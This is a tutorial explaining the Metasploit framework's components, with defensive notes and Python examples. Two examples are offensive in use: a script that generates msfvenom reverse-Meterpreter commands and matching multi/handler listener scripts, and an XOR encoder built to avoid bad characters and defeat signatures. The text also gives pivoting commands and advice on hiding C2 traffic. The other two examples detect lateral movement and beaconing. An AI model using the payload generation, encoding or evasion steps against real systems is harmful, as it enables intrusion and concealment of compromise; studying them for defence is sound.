METASPLOIT
Metasploit functions as a framework that supports the full lifecycle of an operation: reconnaissance (auxiliary), exploitation, delivery of a payload, post‑exploitation (what you do after you get code execution), and techniques to avoid detection (evasion/encoding). Think of it as a toolkit with modules that each serve one role in that lifecycle. Understanding the role of each component helps both red‑teamers and defenders reason about how an incident unfolds.
COMPONENTS
AUXILIARY (RECON & SUPPORT)
Auxiliary modules gather information, discover targets, and run helper services. They do not by themselves produce remote code execution.
Information gathering: collect banners, host/service metadata, basic host facts (OS, versions).
Enumeration: more focused probing to identify exposed services, open ports, or weak configurations (scanners, network sniffers, web crawlers).
Fuzzers: stress or malformed‑input testing on a protocol or app to find crashes or logic faults.
Protocol/application servers: run lightweight services for testing or to emulate behaviors for research.
Admin tools: credential testing or verification when you already possess credentials (used for validating access, not for breaking in).
Defensive note: scanning and enumeration are noisy. One source touching many ports or many hosts in a short window, or repeatedly grabbing banners, stands out in flow and IDS telemetry. Monitoring and rate-limiting, together with honeypot services that no legitimate client should ever touch, help detect this stage.
EXPLOITS
An exploit module takes advantage of a vulnerability to gain code execution or escalate privileges on a target. It is the mechanism that triggers the bug; it is paired with a payload (a separate component, below) that defines what runs once the bug has been triggered.
Payloads, and therefore the exploits that deliver them, come in two forms:
Staged: a small first stage (the stager) runs first and then pulls the rest of the payload (the stage) over the connection it opens. The stager is small enough to fit the space an exploit can deliver; the handler sends the larger stage, such as the Meterpreter DLL, only after the connection is up. In Metasploit names the stager is a separate path element, for example windows/x64/meterpreter/reverse_tcp.
Stageless (also called unstaged or single): the full payload is delivered at once; bigger, but simpler, since nothing further is fetched. Named with an underscore instead, for example windows/x64/meterpreter_reverse_tcp.
Use exploit/multi/handler to catch the connection the payload makes. Think of it as the "listener" that "nc -nlvp <port>" would provide for a plain reverse shell, with one difference that matters: the handler also speaks the staging protocol, so its PAYLOAD, LHOST and LPORT must match the payload that was generated. A staged binary caught by a handler set to the stageless name (or the reverse) will not produce a working session.
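The staged/stageless distinction and the handler pairing above are easy to get wrong on the command line. The following is an added example, not Metasploit code: it reads the framework's payload naming convention (a slash before reverse_tcp/bind_tcp marks a staged payload, an underscore a stageless one, and cmd/ payloads are always single-stage), emits a matching multi/handler resource script and msfvenom command, and reports why a binary and handler would not agree. The msfvenom flags and handler options it prints (-p, -f, -o, LHOST, LPORT, RHOST, ExitOnSession, exploit -j -z) are real; the function names and the example hosts and ports are this example's own.

```python
import re

# Connection half of a payload name: reverse_tcp, bind_tcp, reverse_https, ...
_CONN_RE = re.compile(r"^(?P<dir>reverse|bind)_(?P<transport>\w+)$")
# Stageless form fuses kind and connection: meterpreter_reverse_tcp, shell_bind_tcp
_SINGLE_RE = re.compile(r"^(?P<kind>\w+?)_(?P<dir>reverse|bind)_(?P<transport>\w+)$")


def classify(payload):
    """Describe a payload name: staged or not, bind or reverse, transport, kind."""
    parts = payload.split("/")
    last = parts[-1]
    m = _CONN_RE.match(last)
    if m and parts[0] != "cmd" and len(parts) >= 2:
        # Staged: the connection method is its own path element after the
        # payload kind, e.g. windows/x64/meterpreter/reverse_tcp
        return {"staged": True, "kind": parts[-2], "direction": m.group("dir"),
                "transport": m.group("transport")}
    if m:
        # cmd/* payloads are single-stage command strings, e.g. cmd/unix/reverse_bash
        return {"staged": False, "kind": "cmd", "direction": m.group("dir"),
                "transport": m.group("transport")}
    m = _SINGLE_RE.match(last)
    if not m:
        raise ValueError("unrecognised payload name: %s" % payload)
    # Stageless: e.g. windows/x64/meterpreter_reverse_https
    return {"staged": False, "kind": m.group("kind"), "direction": m.group("dir"),
            "transport": m.group("transport")}


def handler_rc(payload, host, port, exit_on_session=False):
    """msfconsole resource script for exploit/multi/handler that matches `payload`.

    For a reverse payload `host` is the operator's listening address (LHOST);
    for a bind payload it is the target the handler connects to (RHOST).
    """
    info = classify(payload)
    lines = ["use exploit/multi/handler", "set PAYLOAD %s" % payload]
    if info["direction"] == "reverse":
        lines += ["set LHOST %s" % host, "set LPORT %d" % port]
    else:
        lines += ["set RHOST %s" % host, "set LPORT %d" % port]
    # Keep the job alive after the first session so several callbacks can be caught
    lines.append("set ExitOnSession %s" % ("true" if exit_on_session else "false"))
    lines.append("exploit -j -z")
    return "\n".join(lines) + "\n"


def msfvenom_cmd(payload, host, port, fmt="exe", out="payload.exe"):
    """msfvenom command line producing a binary the handler above will catch."""
    info = classify(payload)
    if info["direction"] == "reverse":
        conn = "LHOST=%s LPORT=%d" % (host, port)
    else:
        conn = "LPORT=%d" % port  # a bind payload only needs the port it listens on
    return "msfvenom -p %s %s -f %s -o %s" % (payload, conn, fmt, out)


def check_pair(venom_payload, handler_payload):
    """Return None when binary and handler agree, else the reason they will not."""
    if venom_payload == handler_payload:
        return None
    a, b = classify(venom_payload), classify(handler_payload)
    if a["staged"] != b["staged"]:
        return "staging mismatch: binary is %s, handler expects %s" % (
            "staged" if a["staged"] else "stageless",
            "staged" if b["staged"] else "stageless")
    return "payload mismatch: %s vs %s" % (venom_payload, handler_payload)


if __name__ == "__main__":
    # Example hosts/ports are assumptions for illustration only.
    p = "windows/x64/meterpreter/reverse_tcp"
    print(msfvenom_cmd(p, "10.0.0.5", 4444))
    print(handler_rc(p, "10.0.0.5", 4444))
    print(check_pair("windows/x64/meterpreter_reverse_tcp", p))
```

Save the resource script and start it with msfconsole -r handler.rc; run check_pair on the two names before generating anything, since a mismatch only shows up as a callback that never becomes a session.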
PAYLOADS (WHAT RUNS AFTER EXPLOITATION)
These define the code or behavior executed on the target after successful exploitation.
Interactive shells: gives an operator a command interface to the remote host.
Agents / advanced shells: richer agents that support file operations, process enumeration, in‑memory features, etc.
One‑shot commands: execute a single command and return output.
Bind payloads: open a listening port on the target and wait for the operator to connect. Useful when the target is directly reachable and not behind a firewall or NAT. Think of a server on the target side that the operator connects to as a client.
Reverse payloads: the target connects back to the operator. Useful when inbound connectivity to the target is blocked by firewalls or NAT. Think of a server on the operator side that the target connects to. Firewalls on the target side typically block connections initiated from outside, but they usually allow hosts behind them to initiate outbound connections, which is why reverse payloads are the common choice.
Defensive note: Network monitoring for unusual outbound connections (especially to uncommon ports or remote hosts) and endpoint protections that inspect behaviors rather than static signatures are valuable against reverse/staged techniques.
POST EXPLOITATION
This is what an operator does once they have a foothold.
Information gathering: collect credentials, configuration, host inventory, local secrets.
Privilege escalation: attempts to increase privileges (local admin/root) to expand capabilities.
Persistence: create reliable re‑entry mechanisms so access survives reboots or credential changes.
Pivoting: using an initial foothold on one machine to reach systems or network segments that were not directly reachable from the operator's original position. This includes outside-to-inside pivoting, where an externally accessible asset (for example a public web server, VPN endpoint, or remote appliance) is compromised and then used as a springboard to reach internal systems behind firewalls or segmentation. In Metasploit this is done by adding a route through an existing session (for example route add 10.10.10.0 255.255.255.0 1, or the post/multi/manage/autoroute module) so that other modules reach the inner network through that host. Conceptually it turns a compromised host into a launch point for reconnaissance, credential harvesting, and controlled access deeper into the environment; defenders should look for unexpected internal connections originating from externally facing hosts, unusual protocol use crossing segments, or new remote sessions initiated from systems that normally don't act as client machines.
Lateral movement: the actions an intruder takes after gaining an initial foothold to move from one compromised host to others and expand their control. It usually involves discovering network relationships, reusing or stealing credentials, and leveraging legitimate administration tools or services (SMB, RDP, WinRM, PsExec-style remote execution) to access additional systems, which lets the attacker escalate privileges, reach sensitive assets, and maintain persistence. Defenders can spot it by looking for abnormal internal connections, unexpected use of remote administration tools, unusual account activity, and authentications originating from machines that normally wouldn't initiate them.
Defensive note: Focus on anomaly detection: unusual process creation, suspicious privilege changes, new persistence mechanisms, or lateral SMB/RDP traffic can indicate post‑exploit activity.
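The last point in the lateral movement entry, authentications from machines that normally would not initiate them, is concrete enough to run as detection logic. Below is an added example, not part of the original notes: it reads constructed Windows logon events (Event ID 4624, flattened to CSV; the logon types are the real ones, 3 for network and 10 for RemoteInteractive/RDP) against an assumed baseline of hosts that are expected to start remote sessions, and flags both remote logons from hosts outside that baseline and one account fanning out to several hosts within a short window. The sample events, the baseline set and the thresholds are assumptions for illustration.

```python
import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

# Constructed sample of 4624 logon events, not real telemetry.
SAMPLE = """time,event_id,logon_type,account,src_host,dst_host
2024-05-01T09:00:00,4624,10,CORP\\admin.jane,JUMP01,SRV-FILE01
2024-05-01T09:01:00,4624,3,CORP\\svc_backup,SRV-BACKUP,SRV-FILE01
2024-05-01T09:02:00,4624,2,CORP\\bob,WS-0412,WS-0412
2024-05-01T09:05:00,4624,3,CORP\\bob,WS-0412,WS-0419
2024-05-01T09:05:30,4624,3,CORP\\bob,WS-0412,WS-0420
2024-05-01T09:06:10,4624,3,CORP\\bob,WS-0412,SRV-FILE01
2024-05-01T09:06:40,4624,10,CORP\\bob,WS-0412,SRV-DC01
"""

REMOTE_LOGON_TYPES = {"3", "10"}              # 3 = network (SMB/WinRM), 10 = RDP
NORMAL_INITIATORS = {"JUMP01", "SRV-BACKUP"}  # assumed baseline of hosts that start remote sessions
FANOUT_WINDOW = timedelta(minutes=5)          # assumed tuning values
FANOUT_THRESHOLD = 3


def parse_events(text):
    """Parse the CSV form above into dicts with a real datetime in 'time'."""
    rows = list(csv.DictReader(StringIO(text)))
    for r in rows:
        r["time"] = datetime.fromisoformat(r["time"])
    return rows


def detect_lateral_movement(events):
    """Return (rule, src_host, account, detail) tuples for suspicious remote logons."""
    findings = []
    by_actor = defaultdict(list)  # (account, src_host) -> [(time, dst_host)]
    for e in events:
        if e["event_id"] != "4624" or e["logon_type"] not in REMOTE_LOGON_TYPES:
            continue  # local/interactive logons are not movement between hosts
        if e["src_host"] == e["dst_host"]:
            continue
        if e["src_host"] not in NORMAL_INITIATORS:
            findings.append(("unexpected-initiator", e["src_host"], e["account"], e["dst_host"]))
        by_actor[(e["account"], e["src_host"])].append((e["time"], e["dst_host"]))
    for (account, src), hits in by_actor.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            # distinct destinations reached within the window that starts at t0
            targets = {d for t, d in hits[i:] if t - t0 <= FANOUT_WINDOW}
            if len(targets) >= FANOUT_THRESHOLD:
                findings.append(("fan-out", src, account, ",".join(sorted(targets))))
                break
    return findings


if __name__ == "__main__":
    for f in detect_lateral_movement(parse_events(SAMPLE)):
        print(f)
```

The baseline is the part that needs care in practice: build it from weeks of normal 4624 data per host rather than by hand, and keep the fan-out window short, since a real operator moving with a harvested credential tends to touch several hosts within minutes.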
EVASION/COVERT COMMS
This reduces the chance of detection by defenders.
Use encrypted channels or protocols that are normal on the network (HTTPS, DNS) to blend in with legitimate traffic; Meterpreter's reverse_https transport is the framework's built-in example.
Avoid plainly visible clear‑text protocols (simple TCP/UDP flows with unusual payloads are easier to detect).
Time and volume control: lower frequency or smaller payload transfers to reduce noisy indicators.
Defensive note: Network behavior baselining, TLS inspection where appropriate, and endpoint telemetry (process lineage, parent/child relationships) are critical for spotting covert C2 channels.
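Two of the defensive notes above, the one under payloads about unusual outbound connections and the one here about covert C2, can be checked with the same network data, so this single added example serves both. It is not part of the original notes: it reads constructed connection records (timestamp, source, destination, destination port) and flags egress from internal addresses to an external host on a port outside an assumed allowlist (a plain reverse_tcp on 4444), and separately flags a flow whose inter-arrival times are too regular to be a human, even on 443, which is how a covert channel that blends into HTTPS still shows up. The sample records, the allowlist and the thresholds are assumptions for illustration.

```python
import csv
from collections import defaultdict
from io import StringIO
from ipaddress import ip_address, ip_network
from statistics import mean, pstdev

INTERNAL = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
COMMON_PORTS = {80, 443, 53, 123, 25}  # assumed allowlist of routinely used egress ports
MIN_BEACON_CONNS = 6                   # assumed tuning values
MAX_JITTER = 0.15                      # stddev/mean of gaps below this looks machine-timed

# Constructed connection records (epoch seconds), not real telemetry.
SAMPLE = """ts,src,dst,dport
1714554000,10.0.5.23,142.250.72.14,443
1714554020,10.0.5.23,203.0.113.9,4444
1714554100,10.0.5.77,198.51.100.20,443
1714554160,10.0.5.77,198.51.100.20,443
1714554220,10.0.5.77,198.51.100.20,443
1714554281,10.0.5.77,198.51.100.20,443
1714554340,10.0.5.77,198.51.100.20,443
1714554400,10.0.5.77,198.51.100.20,443
1714554405,10.0.5.23,10.0.9.1,445
1714554700,10.0.5.23,142.250.72.14,443
"""


def is_internal(ip):
    """True for RFC 1918 addresses (assumed to be the only internal ranges here)."""
    a = ip_address(ip)
    return any(a in n for n in INTERNAL)


def parse_conns(text):
    rows = list(csv.DictReader(StringIO(text)))
    for r in rows:
        r["ts"] = int(r["ts"])
        r["dport"] = int(r["dport"])
    return rows


def detect_c2(conns):
    """Return ('uncommon-port', src, dst, port) and ('beacon', src, dst, port, mean_gap) findings."""
    findings = []
    flows = defaultdict(list)  # (src, dst, dport) -> [timestamps]
    for c in conns:
        if not is_internal(c["src"]) or is_internal(c["dst"]):
            continue  # only internal -> external egress is of interest here
        if c["dport"] not in COMMON_PORTS:
            findings.append(("uncommon-port", c["src"], c["dst"], c["dport"]))
        flows[(c["src"], c["dst"], c["dport"])].append(c["ts"])
    for key, times in flows.items():
        if len(times) < MIN_BEACON_CONNS:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        jitter = pstdev(gaps) / avg if avg else 0.0
        if jitter < MAX_JITTER:
            # regular check-ins with little jitter, regardless of port or encryption
            findings.append(("beacon",) + key + (round(avg, 1),))
    return findings


if __name__ == "__main__":
    for f in detect_c2(parse_conns(SAMPLE)):
        print(f)
```

The beacon rule is what the "time and volume control" bullet is trying to defeat: an operator who adds random sleep jitter raises the coefficient of variation above the threshold, so in practice this check is paired with longer observation windows and with destination reputation rather than used alone.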
ENCODERS (OBFUSCATION)
Encoders transform a payload's bytes to remove characters that the delivery path cannot carry, or to change the bytes that a signature would match.
Change representation of bytes or strings (simple encoding/obfuscation).
Remove or replace characters that break a delivery mechanism (e.g., null bytes in certain contexts).
Encoders are not cryptographic protection: the encoded bytes are prefixed with a small decoder stub that carries the key, so anyone holding the payload can reverse it. They are obfuscation layers meant to alter signatures, and well-known encoders such as x86/shikata_ga_nai are themselves widely signatured, so encoding alone rarely gets past current endpoint protection.
Defensive note: Behavioral detection and memory‑scanning techniques are more robust than relying on static signature matching, since encoders can defeat simple pattern checks.
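To make the bad-character and "not cryptography" points concrete, here is an added example (not Metasploit code, and no relation to any particular encoder module): a single-byte XOR encoder that searches for a key under which neither the key nor the output contains a bad character, shows that a byte-pattern signature present in the input is gone from the output, and then recovers the key from the encoded blob alone with a known-plaintext crib, which is exactly why an encoder buys no confidentiality. The input bytes are constructed for the example and are not shellcode; the real decoder stub that would precede the output is described in comments, not emitted.

```python
BAD_CHARS = b"\x00\x0a\x0d"  # NUL, LF, CR: typical bytes that break string-based delivery

# Constructed stand-in for a payload. It contains every bad character at least
# once and the byte sequence "h//bin" that a naive signature might look for.
SAMPLE = bytes([0x31, 0xc0, 0x00, 0x50, 0x0a, 0x68, 0x0d, 0x2f,
                0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x6e])
SIGNATURE = b"\x68\x2f\x2f\x62\x69\x6e"


def xor_encode(data, key):
    """XOR every byte with a single-byte key (its own inverse, so it also decodes)."""
    return bytes(b ^ key for b in data)


def find_key(data, bad=BAD_CHARS):
    """Return a key that yields no bad characters in the output.

    The key itself must also be clean, because a real decoder stub embeds it
    in the delivered bytes. Key 0 is skipped since it would change nothing.
    """
    for key in range(1, 256):
        if key in bad:
            continue
        if not any(b in xor_encode(data, key) for b in bad):
            return key
    raise ValueError("no single-byte XOR key avoids the bad characters; use a multi-byte scheme")


def encode(data, bad=BAD_CHARS):
    """Return (key, encoded bytes). A decoder stub prefix would carry `key`."""
    key = find_key(data, bad)
    return key, xor_encode(data, key)


def decode(key, enc):
    return xor_encode(enc, key)


def brute_force_key(enc, crib):
    """Recover the key with no secret knowledge: try all 255 keys, keep the one
    that reveals a plausible plaintext fragment. This is the whole keyspace,
    which is why encoding is obfuscation rather than encryption."""
    for key in range(1, 256):
        if crib in xor_encode(enc, key):
            return key
    return None


if __name__ == "__main__":
    key, enc = encode(SAMPLE)
    print("key=%#04x" % key, "encoded=%s" % enc.hex())
    print("signature in input:", SIGNATURE in SAMPLE, "in output:", SIGNATURE in enc)
    print("recovered key:", brute_force_key(enc, b"/bin"))
```

The failure mode the raise covers is real: a payload that already contains every byte value cannot be cleaned with a one-byte XOR, which is why shipped encoders use additive or polymorphic multi-byte schemes instead. The brute-force function is the defender's view of the same operation.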
METERPRETER AGENT
Meterpreter is an in‑memory post‑exploitation agent that runs inside the address space of a compromised process, allowing an operator to perform interactive actions without necessarily creating new processes or files on disk. Because it executes with the permissions of the exploited process and avoids many on‑disk artifacts, it can be more difficult to detect with simple file‑based scanners; however, it is still discoverable through memory forensics, behavioral telemetry, and network monitoring. It can also migrate into another, longer-lived process so that the session survives the exploited process exiting; that migration is a cross-process injection and is itself a detectable event. Meterpreter supports loadable extensions (for example, PowerShell, Python, and Kiwi/Mimikatz‑style modules) that expand its capabilities for post‑compromise tasks.